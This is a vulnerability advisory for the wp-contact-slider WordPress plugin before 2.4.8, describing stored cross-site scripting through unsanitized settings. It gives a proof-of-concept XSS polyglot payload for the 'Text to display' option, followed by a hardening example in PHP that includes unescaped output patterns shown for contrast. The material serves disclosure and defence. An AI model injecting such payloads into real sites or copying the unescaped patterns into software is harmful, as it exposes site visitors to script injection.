The plugin does not sanitize and escape its settings, allowing high-privilege users such as admins to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
Create/edit a Contact slider and put the payload below in the “Text to display” option:
```
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->alert(String.fromCharCode(88,83,83))
```
| CPE | Name | Operator | Version |
|---|---|---|---|
| | wp-contact-slider | lt | 2.4.8 |
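
The missing controls named in the description, sanitizing a setting on save and escaping it on output, look like this in a WordPress plugin. This is an added example, not the plugin's own code or its actual patch; the option name `demo_slider_text`, the settings group `demo_slider_group` and the markup are hypothetical, and a settings form posting to `options.php` for that group is assumed to exist.

```php
<?php
/**
 * Plugin Name: Demo Slider Settings Hardening (added example)
 */

// Hypothetical option name; the real plugin's option keys are not shown on the page.
const DEMO_OPT = 'demo_slider_text';

// 1. Sanitize on save. The callback runs for every user who can save the
//    setting, so it also covers admins who lack unfiltered_html.
add_action( 'admin_init', function () {
    register_setting( 'demo_slider_group', DEMO_OPT, array(
        'type'              => 'string',
        'sanitize_callback' => 'sanitize_text_field', // strips tags and line breaks
        'default'           => '',
    ) );
} );

// 2. Escape on output, per context. Sanitizing on save does not replace this:
//    quote characters survive sanitize_text_field and still matter inside
//    attributes and inline scripts.
add_action( 'wp_footer', function () {
    $text = (string) get_option( DEMO_OPT, '' );

    // Unescaped pattern, shown only for contrast:
    //   echo "<a title='$text'>$text</a>";
    //   echo "<script>var label = '$text';</script>";

    // HTML attribute context and HTML body context.
    printf(
        '<a class="demo-slider-tab" title="%s">%s</a>',
        esc_attr( $text ),
        esc_html( $text )
    );

    // JavaScript context: emit a JSON string literal instead of hand-quoting,
    // with <, >, &, ' and " hex-encoded so the value cannot close the string
    // or the surrounding script element.
    printf(
        '<script>var demoSliderLabel = %s;</script>',
        wp_json_encode( $text, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT )
    );
} );
```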